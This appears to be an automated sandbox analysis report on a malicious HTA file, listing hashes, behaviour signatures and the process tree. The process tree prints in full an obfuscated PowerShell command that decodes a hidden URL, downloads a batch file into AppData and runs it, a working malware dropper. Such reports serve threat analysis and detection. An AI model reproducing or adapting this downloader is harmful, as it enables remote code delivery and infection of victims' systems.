Overview

overview

10

Static

static

1

07052024_0...co.hta

windows7-x64

8

07052024_0...co.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 08:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07052024_0852_loco.hta

  • Size

    10KB

  • MD5

    9da72d990f0df4b01314b03d824ca97c

  • SHA1

    97166c7480ff92b62469c7eb00390ae294c52fc4

  • SHA256

    19ef64886918d56e1492d010d949d71d5a028d6bc10ed0eee90fc141e491eff3

  • SHA512

    c61957008dcc7bb4fb8555f5fba726a0ce194e6b8692a8f7613977c5526ae8af09510b990e6c600f8e86e97d85c5d72d27a0dd3e55540969f637936f5e3dca78

  • SSDEEP

    192:+oTPT8cVkmolsIqZAsAsIqxEMTPgdlsIqTEbLzpIHuFqbubzAvu2/kKgnkBUR/Uv:N7T8Ykmo6LF7gd6iLzprKgkBU1Uo5NEf

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\07052024_0852_loco.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lZXTF($MqxHxcIwZRg, $fMGMwSEz){[IO.File]::WriteAllBytes($MqxHxcIwZRg, $fMGMwSEz)};function cQjjTlSPNjckyoDbV($MqxHxcIwZRg){if($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37113,37121,37121))) -eq $True){rundll32.exe $MqxHxcIwZRg }elseif($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37125,37128,37062))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $MqxHxcIwZRg}elseif($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37122,37128,37118))) -eq $True){misexec /qn /i $MqxHxcIwZRg}else{Start-Process $MqxHxcIwZRg}};function YqocGdWfMuMwhiqJf($qFOOjapXQLebGJeJ){$OaxOyPNhKDHOQmaQieN = New-Object (rDpQCbMTIHrJEESV @(37091,37114,37129,37059,37100,37114,37111,37080,37121,37118,37114,37123,37129));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$fMGMwSEz = $OaxOyPNhKDHOQmaQieN.DownloadData($qFOOjapXQLebGJeJ);return $fMGMwSEz};function rDpQCbMTIHrJEESV($zDGp){$QzFqSsEGlhm=37013;$SHsugb=$Null;foreach($rhEfSaHelNsbvfGI in $zDGp){$SHsugb+=[char]($rhEfSaHelNsbvfGI-$QzFqSsEGlhm)};return $SHsugb};function lhPsZvpGwWhdT(){$SXnxmHWBJ = $env:AppData + '\';$VkozC = $SXnxmHWBJ + 'loco.bat'; if (Test-Path -Path $VkozC){cQjjTlSPNjckyoDbV $VkozC;}Else{ $STrXWIbiRPl = YqocGdWfMuMwhiqJf (rDpQCbMTIHrJEESV @(37117,37129,37129,37125,37128,37071,37060,37060,37115,37118,37113,37114,37121,37118,37129,37134,37058,37115,37121,37124,37124,37127,37118,37123,37116,37118,37123,37112,37059,37112,37124,37122,37060,37121,37124,37112,37124,37059,37111,37110,37129));lZXTF $VkozC $STrXWIbiRPl;cQjjTlSPNjckyoDbV $VkozC;};;;;}lhPsZvpGwWhdT;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads